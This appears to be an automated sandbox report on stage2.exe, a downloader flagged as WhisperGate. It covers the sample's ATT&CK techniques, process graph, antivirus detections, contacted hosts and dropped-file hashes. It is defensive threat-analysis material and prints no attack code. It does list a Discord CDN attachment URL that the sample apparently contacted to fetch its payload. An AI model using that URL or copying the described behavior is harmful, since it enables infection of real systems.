    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Users\user\Desktop\stage2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D5860 CreateNamedPipeW,
    Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.drBinary or memory string: c:\users\user\desktop\procexp.exe
    Source: Amcache.hve.26.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.drBinary or memory string: procexp.exe

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsPowerShell1Path InterceptionProcess Injection13Masquerading1OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection13NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 553986 Sample: stage2.exe Startdate: 17/01/2022 Architecture: WINDOWS Score: 72 29 Multi AV Scanner detection for submitted file 2->29 31 Yara detected MSILDownloaderGeneric 2->31 33 .NET source code contains potential unpacker 2->33 35 2 other signatures 2->35 7 stage2.exe 15 3 2->7         started        process3 dnsIp4 25 cdn.discordapp.com 162.159.130.233, 443, 49752 CLOUDFLARENETUS United States 7->25 37 Encrypted powershell cmdline option found 7->37 11 WerFault.exe 23 9 7->11         started        15 powershell.exe 18 7->15         started        17 powershell.exe 14 7->17         started        signatures5 process6 dnsIp7 27 192.168.2.1 unknown unknown 11->27 23 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 11->23 dropped 19 conhost.exe 15->19         started        21 conhost.exe 17->21         started        file8 process9

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    stage2.exe45%VirustotalBrowse
    stage2.exe49%ReversingLabsByteCode-MSIL.Network.WhisperGate
    stage2.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://watson.telemetry)0%Avira URL Cloudsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    http://crl.microsoft0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://cdn.discordapp.com40%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png$0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    cdn.discordapp.com
    		162.159.130.233
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpgfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://watson.telemetry)WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		low
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
          		high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
            		high
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                		high
                http://crl.microsoftpowershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                  		high
                  https://go.micropowershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                      		high
                      https://github.com/Pester/Pester$powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                        		high
                        http://upx.sf.netAmcache.hve.26.drfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                            		high
                            https://cdn.discordapp.comstage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                      		high
                                      https://cdn.discordapp.com4stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.html$powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                                              		high
                                              http://cdn.discordapp.comstage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://pesterbdd.com/images/Pester.png$powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namestage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                                      		high

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      162.159.130.233
                                                      		cdn.discordapp.comUnited States
                                                      		13335CLOUDFLARENETUSfalse

                                                      Private

                                                      IP
                                                      192.168.2.1

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:553986
                                                      Start date:17.01.2022
                                                      Start time:02:23:19
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 44s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:stage2.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:28
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal72.troj.evad.winEXE@8/14@1/2
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HDC Information:
                                                      • Successful, ratio: 96.4% (good quality ratio 85.7%)
                                                      • Quality average: 71.6%
                                                      • Quality standard deviation: 34.7%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .exe
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 13.89.179.12
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                      • Execution Graph export aborted for target stage2.exe, PID 7084 because there are no executed function
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      02:24:21API Interceptor67x Sleep call for process: powershell.exe modified
                                                      02:25:42API Interceptor1x Sleep call for process: WerFault.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASN

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_stage2.exe_71132b2d46f2be7ca5f7ca27edcda1a773a522_f347d55b_0069b9d6\Report.wer
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.213468288928447
                                                      Encrypted:false
                                                      SSDEEP:192:OOGYNnugoHBUZMXmAMaPbFx3iIQ/u7sdS274ItrW:mYNnOBUZMXmAMayIQ/u7sdX4ItrW
                                                      MD5:001C5A8A35F2A1BC8E8B554AAD9D99FB
                                                      SHA1:14FB74DBD5C503FD7CAEE5454006BBC8F5D38A9F
                                                      SHA-256:5B31C7776A10B1EF5250A21468601C317530F710D1825100DFA2344B5397D5AD
                                                      SHA-512:0DA7DC6F44012F114B3A905DA3E7E4DA70BCCF075F4830F10EFA1BB49EDB41445D7E684011569D31EC651BE13414C0558D003C1931A78C930CD51583CB8EBAEF
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.8.8.8.7.3.0.7.3.8.2.6.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.8.8.8.7.4.1.3.3.2.0.1.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.b.4.c.0.5.7.-.f.5.c.4.-.4.c.3.b.-.9.f.9.0.-.4.e.0.f.5.3.a.3.7.8.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.a.4.c.1.c.c.-.3.7.f.f.-.4.5.9.4.-.8.e.8.7.-.1.0.0.6.c.0.a.2.e.6.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.t.a.g.e.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.b.o.p.b.h...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.c.-.0.0.0.1.-.0.0.1.c.-.0.8.c.a.-.0.0.5.c.8.c.0.b.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.c.2.0.c.f.5.e.9.6.c.6.9.c.0.3.a.3.e.0.a.a.e.0.d.7.e.2.8.e.b.0.0.0.0.0.0.0.0.0.!.0.0.0.0.1.6.5.2.5.c.b.2.f.d.8.6.d.c.e.8.4.2.1.0.7.e.b.1.b.a.6.1.7.4.b.2.3.f.1.8.8.5.3.7.!.s.
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER14DB.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Mon Jan 17 10:25:36 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):273022
                                                      Entropy (8bit):3.853179800245628
                                                      Encrypted:false
                                                      SSDEEP:3072:cGlpb60CrUCgU/aDDrs0wTcjd+p+otu9gIOgF5oaIq:cGlwXTjCDDQ00p+79RpD
                                                      MD5:47039F84D9CE3BB540A5FF9C7A61CF31
                                                      SHA1:85474DBDAB51F24FA6D607CC52DC64AAEB7B50B2
                                                      SHA-256:C9804775D078275DF81CF7CFFF3FBACCBD3BD9320912BA0976EFEDCAE3010692
                                                      SHA-512:357F888EDC052948B989FEFD8E8195F80C834D85E4F019887F0D5810AAA3B53691ACA450D4CF66D4DB98EAACF4463904E78E456EA7F2E6A7FC40D774E06737DB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: MDMP....... ....... D.a........................X!..(.......T....*.......'...X..........`.......8...........T............]...............*...........,...................................................................U...........B......X-......GenuineIntelW...........T............C.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER318C.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.6933539692953867
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNisE6isU6YFfSU6PgmfZjQSnCpr/89bq4sfxDum:RrlsNi36isU6Y9SU6PgmfdQS/qrf1
                                                      MD5:0306EC771A2FC951837BE91CFBF8E011
                                                      SHA1:3A272CDBEA785BE069408708146463007864479B
                                                      SHA-256:8335F027896C9E2A3D22A7B4DEBDD792618D2F87BF1A92B82685CBA121F160E6
                                                      SHA-512:94C083DAA372FE2F7B40155FABCE226B4D09AA8C1BBA7DBAC71574C488B11C03E8F35ED334CB7C11DF4C4D277876631CEC2F52926393233BEB8648D34D522656
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.4.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3611.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4725
                                                      Entropy (8bit):4.437433265070294
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsaJgtWI9jMXjSWSC8BQs8fm8M4JNfJF7EI+q8vjfBnLf2S9SNd:uITfoEMXjzSNORJzK1L2S9SNd
                                                      MD5:507EFECDC1ABF8B2E8511E0F7A40ABB0
                                                      SHA1:0E29D507CD2497027B125A0C9C2B13D06A084595
                                                      SHA-256:AC230930084B32AC3153DA023ACE28A1C3614C28E833BF3A3EB4D8F02C4E2482
                                                      SHA-512:44239E9BE6D2B9E6F33B989698A835DBCFB49F0765FAA03C99149A193C1FF6A85D0FD1147A31EBC26A97DFC3C9D6C919EA9ABD9D982C187DEC496DD32AE4B798
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1346136" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5829
                                                      Entropy (8bit):4.8968676994158
                                                      Encrypted:false
                                                      SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                      MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                      SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                      SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                      SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):16360
                                                      Entropy (8bit):5.56095611490378
                                                      Encrypted:false
                                                      SSDEEP:384:nt9/62zDkCGm9M3i6b+cBSBKnQultIK8tpRuFZU9NnaqYCy:+YGm+3J74KQultAnRo+ajV
                                                      MD5:251C0346B0D4B607AE0308E7A63905CC
                                                      SHA1:259BD3A23B07329B366836FEABFC5C375C2CFD98
                                                      SHA-256:ABD1AC4894EA5AC7AF272589E97472DFA394A8B3E0A92120732E551978952D42
                                                      SHA-512:45A9CCB3AD2146A584CBFE34BEFF38789D2811F12388F3078444CCEB52C203E47957906DB42311EA00CAC6E322DB5460B255F1E11EA1225254ADB8CCF1FE4BA1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: @...e...............................[.B.:.u..........@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hiw1gde.haw.ps1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfyzxky1.kbr.psm1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
